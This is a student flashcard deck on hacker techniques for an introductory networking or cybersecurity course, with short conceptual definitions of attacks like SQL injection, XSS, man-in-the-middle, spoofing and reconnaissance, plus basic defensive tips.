8.1.3 Hackers

avatar
Created by
Dylan Tappenden

Cards (78)

  • Hackers use many techniques name 8 of them:
    Social Engineering
    Phishing
    SQL Injection
    Cross-site Scripting
    Brute Force Attack
    DDOS
    Shoulder surfing
    MitM
    DNS hijacking
  • Social engineering is making someone reveal info they otherwise wouldn't
  • SQL injection is:
    Gaining unauthorized access by inserting malicious code into a SQL query
  • Cross-site scripting is:
    Where a website allows a threat actor to input a script onto the website
  • Brute force attacking is:
    Repeating a technique until it works such as randomly inputting passwords
  • DDOS or Distributed Denial Of Service is:
    Using a botnet to overload a server in attempt to make it's function impaired
  • Shoulder surfing is:
    Viewing another's screen to view sensitive data
  • A man in the middle attack is:
    A person places themselves between a host and a client or within many other alternative direct connections, and then viewing/altering/storing data being transferred
  • DNS hijacking is:
    A DNS is impaired such that when the user attempts to access a legitimate website, a malicious website is shown instead.
  • Dictionary password attacks is:
    Using a list of common words to guess the password, another way is to use previous passwords associated with the account through leaks
  • Is a brute force or dictionary password attack more likely to be automated?
    Brute force
  • To avoid XSS attacks, web developers should implement security measures such as validating input data, sanitizing user input, and using Content Security Policy (CSP). Validating input data checks formatting and for requirements. Sanitizing user input removes any potentially malicious code. CSP specify which content sources are allowed to load on their websites, prevents the execution of any malicious code.
  • Bait-and-switch is:
    Where a hacker offers something, that is actually malicious, such as malware
  • Cookie theft/session jacking is:
    Steals the session from the user, giving them unauthorised access to data
  • How is cookie theft usually done?
    Intercepting cookies that are being transferred, to access data stored in the cookies
  • Why are cookies targeted by hackers?
    Contain session IDs, authentication credentials, and other sensitive data
  • Fake WAP attacks are:
    A network is impersonated, usually to facilitate man-in-the-middle attacks
  • Clickjacking is:
    Placing hidden elements over elements on webpage
  • Clickjacking two example situations:
    Like button over another to boost social media post
    Pharming using the legitimate websites code, and then adding the hidden overlay
  • A waterhole attack is:
    Compromising a website that user often accesses, to install malware on their system to gain unauthorised access
  • A waterhole attack is named that as?
    It's similar to the tactic used in the wild, where a predator waits near a waterhole for their prey to drink, attacking them when they are vulnerable.
  • DOS and MITM attacks are both good examples of bad actor attack types, name 5 more?
    Sniffer
    Password
    IP spoofing
    Eavesdropping
    Data modification
  • A sniffer is an app or device that reads packets passing through it in real time
  • Sniffers can be protected against with encryption
  • Password-based attacks are where a a threat actors tries to guess a password or brute force a password, to have higher level access
  • IP address spoofing is where a threat actor constructs an IP packet that appears to originate from a valid address inside the corporate
  • Data modification attack is modifying enterprise traffic to introduce a malicious payload into the network.
  • Networks are susceptible to the following types of attack:
    Reconnaissance
    Access
    DoS
  • 5 techniques used in reconnaissance attacks are:
    Perform an info query on target
    Ping sweep target network
    Initiate a port scan of active IP addresses
    Run vulnerability scanners
    Run exploitation tools
  • Reconnaissance attacks, precede access or DoS attacks
  • Threat actors use recon attacks to understand and map a system
  • Access attacks exploit known vulnerabilities of a system to gain entry to data, gain access, or escalate access privilege to admin status
  • Password attacks are where threat actors attempt to discover passwords, generally of some importance
  • Spoofing attacks are where a threat actor device attempts to pose as another device by falsifying data.
  • Spoofing attacks include:
    MAC spoofing
    DCHP spoofing
    IP spoofing
  • 4 less common/important access atacks:
    MitM - intercepting traffic such as sensitive info or passwords
    Trust exploitation - threat actor is given access
    Buffer overflow
    Port redirections
  • The SET is the?
    Social engineering toolkit
  • The SET was designed to help white hat hackers and other network security personnel create social engineering attacks to test their network.
  • IP doesn't validate whether the packet actually came from it's source. Therefore threat actors can send packets using a spoofed IP address
  • IP attack techniques:
    ICMP - use ICMP pings to discover subnets and hosts
    Amplification and reflection - prevent legitimate users from accessing info
    Address spoofing - spoof the source in an IP for blind spoofing
    MITM - transparently monitor, capture, and control communication
    Session hijacking - Threat actors access a physical network